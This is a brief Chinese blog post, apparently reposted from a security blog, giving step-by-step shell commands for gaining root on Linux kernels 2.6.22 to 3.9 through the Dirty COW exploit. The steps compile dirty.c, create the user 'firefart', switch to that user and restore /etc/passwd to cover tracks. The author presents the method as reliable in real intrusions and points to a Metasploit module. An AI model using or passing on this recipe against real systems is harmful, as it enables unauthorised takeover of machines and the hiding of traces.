linux溢出提权小记

1、'脏牛'[Dirty copy-on-write] 提权小记:

2、实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本  Dirty COW.c  2.6.22 < 3.9 

3、$ gcc -pthread dirty.c -o dirty -lcrypt

4、$ ./dirty admin

5、$ su firefart

6、# mv /tmp/passwd.bak /etc/passwd 干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试

7、# exit

小结:

另外还有一些比较经典的linux提权exp,后期有空会慢慢推上来

文章出处：klion's blog

原文链接：https://klionsec.github.io/2017/04/22/dirty/

始发于微信公众号： 黑白之道